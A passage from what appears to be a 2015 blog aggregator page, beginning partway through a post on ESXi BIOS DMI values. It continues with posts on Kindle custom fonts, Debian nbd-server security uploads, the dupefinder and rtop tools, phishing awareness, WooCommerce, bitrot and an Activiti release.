ESX 4U1 - BIOS Release Date: 09/22/2009 - Address 0xEA550 - Size 88752 bytes
ESX 4.1 - BIOS Release Date: 10/13/2009 - Address 0xEA2E0 - Size 89376 bytes
ESXi 5 - BIOS Release Date: 01/07/2011 - Address 0xE72C0 - Size 101696 bytes

ESXi 5.1 - BIOS Release Date: 06/22/2012 - Address: 0xEA0C0 - Size: 89920 bytes
ESXi 5.5 - BIOS Release Date: 07/30/2013 - Address: 0xEA050 - Size: 90032 bytes
ESXi 6 - BIOS Release Date: 09/30/2014 - Address: 0xE9A40 - Size: 91584 bytes


NB These DMI properties are set at boot time. Even if your VM gets live-migrated to a host running a different vSphere version, your VM will keep the values it got from the host it booted on. What you see is the vSphere version of the host your VM booted on.

by Bert de Bruijn (noreply@blogger.com) at May 26, 2015 12:02 PM

Frank Goossens

Music from Our Tube: Daniel Lanois going drum&bass

As usual I heard this on KCRW earlier today; Daniel Lanois leaving his  roots-oriented songwriting for some pretty spaced-out instrumentals with a jazz-like and sometime straight drum & bass feel to them. This is “Opera”, live;

YouTube Video
Watch this video on YouTube or on Easy Youtube.

You can watch, listen & enjoy more live “flesh & machine”-material in this live set on KCRW.

by frank at May 26, 2015 05:27 AM

May 25, 2015

Mattias Geniar

Custom Fonts On Kindle Paperwhite First Generation

The post Custom Fonts On Kindle Paperwhite First Generation appeared first on ma.ttias.be.

I have something to admit: I'm a bit obsessive when it comes to fonts.

Nobody notices it, but this blog has changed more fonts in the last 6 months than I care to remember. Chaparral-Pro, Open Sans, HelveticaNeue-Light, ... they've all been used.

For me, a proper font makes or breaks a reading experience. In fact, I can still remember when just a few hours before launching our corporate website, I mentioned this "cool font I just came across" to Chris, and we decided to switch to HelveticaNeue-Light for the site, last minute.

Even our animated video got a font-change because of my obsessiveness. All for the better, of course.

So as much as the internet is about fonts and typography, kerning and whitespace, it sort of surprises me that the e-book world isn't. Or maybe it is, but it's only for the newer generation Ebooks.

I'm at my second Kindle now and I'd buy one again in a heartbeat. It's absolutely brilliant. But after a few years, you begin to notice the outdatedness of the device. It looks and feels old. To me, that's in large part because of the default font Caecilia.

Here's what it looks like.

caecilia_font_kindle

It looks bold and makes the device feel older than it really is.

On the Kindle, I've used that font for many years. Largely because I had no idea that I could change the font in the first place. But it's readable and there really isn't much bad about it. It gets the job done.

Here's what it looks like on the Kindle itself, as the cover page of Becoming Steve Jobs.

kindle-caecille

A very quick way of making the Kindle feel new again is by changing to the other built-in fonts, more specifically Palatino.

kindle-palatino

It's more in line with modern typography as seen on the web: a lighter font that vaguely resembles HelveticaNeue.

But the default font options are limited. There are 6 included in my Paperwhite. And because geeks will be geeks, I wanted a font I choose.

First, make sure you're on the 5.3.1 version. I've read some blogposts about alternative methods working on 5.3.1+ versions, but none of them seemed to work for me. Download the 5.3.1 binary image here.

Next disable WiFi on the PaperWhite, because the auto-upgrades will break this functionality. You can enable it again later on, after you've added the fonts.

To downgrade the Kindle (in case you need to) follow these steps;

  1. Download earlier update file from Amazon: Kindle Paperwhite 1 Update 5.3.1
  2. Disable wifi on your Paperwhite (airplane mode).
  3. Connect your Kindle Paperwhite to your computer (do not disconnect until the last step).
  4. Copy the bin file you downloaded in step 1 to root folder of Paperwhite.
  5. Wait at least 2 minutes after copy has completed (the devices need to register the .bin internally).
  6. Push and hold power button until your Paperwhite restarts (the led blinks orange and light turns on at the screen).
  7. Wait until the Paperwhite has installed the upgrade (which is really a downgrade).
  8. Now you can DISCONNECT from your computer.

If you've done the steps right, the next time the Kindle boots it'll flash itself from the supplied .bin file.

kindle_downgrading

Once you're on 5.3.1, getting the fonts activated is pretty easy.

Connect to the device to your PC and do these steps;

  1. In the root of the Kindle, make a file called "USE_ALT_FONTS" with no content. (touch USE_ALT_FONTS)
  2. Make a folder called fonts and drop your favourite font in there, in 4 versions each: Regular, Italic, Bold, BoldItalic. The filename needs to include those versions in the suffix, see the example below.

    I downloaded the ChaparralPro font from Fontzone.

    ChaparralPro_fonts_kindle

  3. After you've uploaded the fonts, reboot your Kindle
  4. After it booted, go to search in the dashboard/home screen and type ;fc-cache as a command.

    That forces the Kindle to rebuild its font database. After 4-5 minutes, the device will flash white and reload its UI, that is the sign that the reload finished. Take your time for this.

    The command will look like it completed instantly, but is still running in the background.

kindle-fc-cache

Once it reboots, you'll find a lot more fonts available in the Font Selection window. Enabling the USE_ALT_FONTS flag also unlocks other, already installed, fonts on the device.

kindle_unlocked_font_selections

After the Kindle booted, I chose the new Chaparral Pro font, increased the font size with 2 options higher than the default and we're good to go.

kindle_chaparralpro

I'm really happy with the results: the Chaparral Pro font is very pleasing to read.

Here's a side-by-side comparison of the original, the on-board Palatino and the newly installed Chaparral Pro. Click on the image for a bigger view.

kindle_font_comparison

The photo quality is sloppy, as I took "screenshots" with my phone. That means the angle is off every time and the alignment just downright sucks. But it gets the message across.

I'm hoping the next e-reader I buy has simpler options for managing custom fonts and takes its typography more seriously.

The post Custom Fonts On Kindle Paperwhite First Generation appeared first on ma.ttias.be.

by Mattias Geniar at May 25, 2015 09:03 PM

May 24, 2015

Wouter Verhelst

Fixing CVE-2015-0847 in Debian

Because of CVE-2015-0847 and CVE-2013-7441, two security issues in nbd-server, I've had to updates for nbd, for which there are various supported versions: upstream, unstable, stable, oldstable, oldoldstable, and oldoldstable-backports. I've just finished uploading security fixes for the various supported versions of nbd-server in Debian. There're various relevant archives, and unfortunately it looks like they all have their own way of doing things regarding security:

While I understand how the differences between the various approaches have come to exist, I'm not sure I understand why they are necessary. Clearly, there's some room for improvement here.

As anyone who reads the above may see, doing an upload for squeeze-lts is in fact the easiest of the three "stable" approaches, since no intermediate steps are required. While I'm not about to advocate dropping all procedures everywhere, a streamlining of them might be appropriate.

May 24, 2015 07:18 PM

May 23, 2015

Ruben Vermeersch

dupefinder - Removing duplicate files on different machines

Imagine you have an old and a new computer. You want to get rid of that old computer, but it still contains loads of files. Some of them are already on the new one, some aren’t. You want to get the ones that aren’t: those are the ones you want to copy before tossing the old machine out.

That was the problem I was faced with. Not willing to do this tedious task of comparing and merging files manually, I decided to wrote a small tool for it. Since it might be useful to others, I’ve made it open-source.

Introducing dupefinder

Here’s how it works:

  1. Use dupefinder to generate a catalog of all files on your new machine.
  2. Transfer this catalog to the old machine
  3. Use dupefinder to detect and delete any known duplicate
  4. Anything that remains on the old machine is unique and needs to be transfered to the new machine

You can get in two ways: there are pre-built binaries on Github or you may use go get:

go get github.com/rubenv/dupefinder/...

Usage should be pretty self-explanatory:

Usage: dupefinder -generate filename folder...
    Generates a catalog file at filename based on one or more folders

Usage: dupefinder -detect [-dryrun / -rm] filename folder...
    Detects duplicates using a catalog file in on one or more folders

  -detect=false: Detect duplicate files using a catalog
  -dryrun=false: Print what would be deleted
  -generate=false: Generate a catalog file
  -rm=false: Delete detected duplicates (at your own risk!)

Full source code on Github

Technical details

Dupefinder was written using Go, which is my default choice of language nowadays for these kind of tools.

There’s no doubt that you could use any language to solve this problem, but Go really shines here. The combination of lightweight-threads (goroutines) and message-passing (channels) make it possible to have clean and simple code that is extremely fast.

Internally, dupefinder looks like this:

Each of these boxes is a goroutine. There is one hashing routine per CPU core. The arrows indicate channels.

The beauty of this design is that it’s simple and efficient: the file crawler ensures that there is always work to do for the hashers, the hashers just do one small task (read a file and hash it) and there’s one small task that takes care of processing the results.

The end-result?

A multi-threaded design, with no locking misery (the channels take care of that), in what is basically one small source file.

Any language can be used to get this design, but Go makes it so simple to quickly write this in a correct and (dare I say it?) beautiful way.

And let’s not forget the simple fact that this trivially compiles to a native binary on pretty much any operationg system that exists. Highly performant cross-platform code with no headaches, in no time.

The distinct lack of bells and whistles makes Go a bit of an odd duck among modern programming languages. But that’s a good thing. It takes some time to wrap your head around the language, but it’s a truly refreshing experience once you do. If you haven’t done so, I highly recommend playing around with Go.

Random questions


Comments | @rubenv on Twitter

May 23, 2015 11:44 AM

May 22, 2015

Xavier Mertens

When Security Makes Users Asleep!

AsleepIt’s a fact, in industries or on building sites, professional people make mistakes or, worse, get injured. Why? Because their attention is reduced at a certain point. When you’re doing the same job all day long, you get tired and lack of concentration. The same can apply in information security! For a long time, more and more solutions are deployed in companies to protect their data and users. Just make your wishlist amongst firewalls, (reverse-)proxies, next-generation firewalls, ID(P)S, anti-virus, anti-malware, end-point protection, etc (The list is very long). Often multiple lines of defenses are implemented with different firewalls, segmented networks, NAC. The combination of all those security controls tend to reduce successful attacks to a minimum. “To tend” does not mean that all of them will be blocked! A good example are phishing emails, they remain a very good way to abuse people. If most of them will be successfully detected, only one may have disastrous impacts. Once dropped in a user mailbox, there are chances that the potential victim will be asleep… Indeed, the company spent a lot of money to protect its infrastructure so the user will think “My company is doing a good job at protecting myself, so if I receive a message in my mailbox, I can trust it!“. Here is a real life example I’m working on.

A big organization received a very nicely formated email from a business partner. The mail had an attachment pretending to be a pending invoice and was sent to <info@company.com>. The person reading the information mailbox forwarded it, logically, to the accounting department. There, an accountant read the mail (coming from a trusted partner and forwarded by a colleague – what can go wrong?) and opened the attachment. No need to tell the rest of the story, you can imagine what happened. The malicious file was part of a new CBT-Locker campaign: The new malicious file was generated only a few hours before the attacks and, no luck, the installed solutions were not able (yet) to detect it. The malicious files passed successfully the following controls:

Users, don’t fall aspleep! Keep your eyes open and keep in mind that the controls deployed by your company are a way to reduce the risks of attacks. You car has ABS, ESP, cross-lane detection systems and much more but you still need to pay attention to the road! The same applies in IT, stay safe…

by Xavier at May 22, 2015 11:53 AM

Dries Buytaert

Why WooMattic is big news for small businesses

Earlier this week Matt Mullenweg, founder and CEO of Automattic, parent company of WordPress.com, announced the acquisition of WooCommerce. This is a very interesting move that I think cements the SMB/enterprise positioning between WordPress and Drupal.

As Matt points out a huge percentage of the digital experiences on the web are now powered by open source solutions: WordPress, Joomla and Drupal. Yet one question the acquisition may evoke is: "How will open source platforms drive ecommerce innovation in the future?".

Larger retailers with complex requirements usually rely on bespoke commerce engines or built their online stores on solutions such as Demandware, Hybris and Magento. Small businesses access essential functions such as secure transaction processing, product information management, shipping and tax calculations, and PCI compliance from third-party solutions such as Shopify, Amazon's merchant services and increasingly, solutions from Squarespace and Wix.

I believe the WooCommerce acquisition by Automattic puts WordPress in a better position to compete against the slickly marketed offerings from Squarespace and Wix, and defend WordPress's popular position among small businesses. WooCommerce brings to WordPress a commerce toolkit with essential functions such as payments processing, inventory management, cart checkout and tax calculations.

Drupal has a rich library of commerce solutions ranging from Drupal Commerce -- a library of modules offered by Commerce Guys -- to connectors offered by Acquia for Demandware and other ecommerce engines. Brands such as LUSH Cosmetics handle all of their ecommerce operations with Drupal, others, such as Puma, use a Drupal-Demandware integration to combine the best elements of content and commerce to deliver stunning shopping experiences that break down the old division between brand marketing experiences and the shopping process. Companies such as Tesla Motors have created their own custom commerce engine and rely on Drupal to deliver the front-end customer experience across multiple digital channels from traditional websites to mobile devices, in-store kiosks and more.

To me, this further accentuates the division of the CMS market with WordPress dominating the small business segment and Drupal further solidifying its position with larger organizations with more complex requirements. I'm looking forward to seeing what the next few years will bring for the open source commerce world, and I'd love to hear your opinion in the comments.

by Dries at May 22, 2015 03:38 AM

May 21, 2015

Mattias Geniar

rtop: Remote System Monitoring Via SSH

The post rtop: Remote System Monitoring Via SSH appeared first on ma.ttias.be.

This is a simple but effective tool: rtop.

rtop is a remote system monitor. It connects over SSH to a remote system and displays vital system metrics (CPU, disk, memory, network). No special software is needed on the remote system, other than an SSH server and working credentials.

You could question why you wouldn't just SSH into the box and run top, but hey, let's just appreciate rtop for what it is: a simple overview of the systems' state and performance.

Installation

Not that hard, you just need the Go language runtime.

$ git clone --recursive http://github.com/rapidloop/rtop
$ cd rtop
$ make

For a few days, there was a problem with connecting over keys that use passphrases, but that was resolved in issue #16.

Running rtop

As easy as the installer.

rtop user@host:2222 1

This translates to;

And then you have your output.

./rtop user@host:2222 1
host.domain.tld up 57d 22h 32m 7s

Load:
    0.19 0.05 0.01

Processes:
    1 running of 240 total

Memory:
    free    = 573.58 MiB
    used    =   1.89 GiB
    buffers = 144.43 MiB
    cached  =   1.05 GiB
    swap    =   4.00 GiB free of   4.00 GiB

Filesystems:
           /:  21.25 GiB free of  23.23 GiB

Network Interfaces:
    eth0 - 192.168.10.5/26, fe80::aa20:66ff:fe0d/64
      rx = 523.23 GiB, tx = 4972.94 GiB

    lo - 127.0.0.1/8, ::1/128
      rx =   2.69 GiB, tx =   2.69 GiB

Pretty neat summary of the system.

The post rtop: Remote System Monitoring Via SSH appeared first on ma.ttias.be.

by Mattias Geniar at May 21, 2015 09:30 PM

Frank Goossens

Instant Pages vs Instant Web?

Again an interesting ALA-article about web performance (or the lack thereoff), triggered by Facebook’s “Instant Articles” announcement;

I think we do have to be better at weighing the cost of what we design, and be honest with ourselves, our clients, and our users about what’s driving those decisions. This might be the toughest part to figure out, because it requires us to question our design decisions at every point. Is this something our users will actually appreciate? Is it appropriate? Or is it there to wow someone (ourselves, our client, our peers, awards juries) and show them how talented and brilliant we are?

This exercise clearly starts at the design-phase, because thinking about performance in development or testing-phase is simply too late.

by frank at May 21, 2015 05:17 AM

May 20, 2015

Mattias Geniar

Bitrot

The post Bitrot appeared first on ma.ttias.be.

Nothing new, but I recently got reminded of this bitrot thing.

Let's talk about "bitrot," the silent corruption of data on disk or tape. One at a time, year by year, a random bit here or there gets flipped. If you have a malfunctioning drive or controller—or a loose/faulty cable—a lot of bits might get flipped. Bitrot is a real thing, and it affects you more than you probably realize.

The JPEG that ended in blocky weirdness halfway down? Bitrot. The MP3 that startled you with a violent CHIRP!, and you wondered if it had always done that? No, it probably hadn't—blame bitrot. The video with a bright green block in one corner followed by several seconds of weird rainbowy blocky stuff before it cleared up again? Bitrot.

Bitrot and atomic COWs: Inside “next-gen” filesystems

If you're an Accidental Tech Podcast listener, you'll have heard the rants of John on HFS+ and Bitrot by now. Here's some reading material to keep you focussed;

For the next few weeks, every unexplained filesystem corruption error I encounter will be blamed on bitrot.

The post Bitrot appeared first on ma.ttias.be.

by Mattias Geniar at May 20, 2015 07:08 PM

Joram Barrez

Launching Activiti version 6 in Paris (June 10th)!

The Activiti engine was born five years ago and we started with version 5.0 (a cheeky reference to our jBPM past). In those five years we’ve seen Activiti grow beyond our wildest dreams. It is used all across the globe in all kinds of cool companies. The last couple of months we’ve been working very hard at […]

by Joram Barrez at May 20, 2015 06:40 PM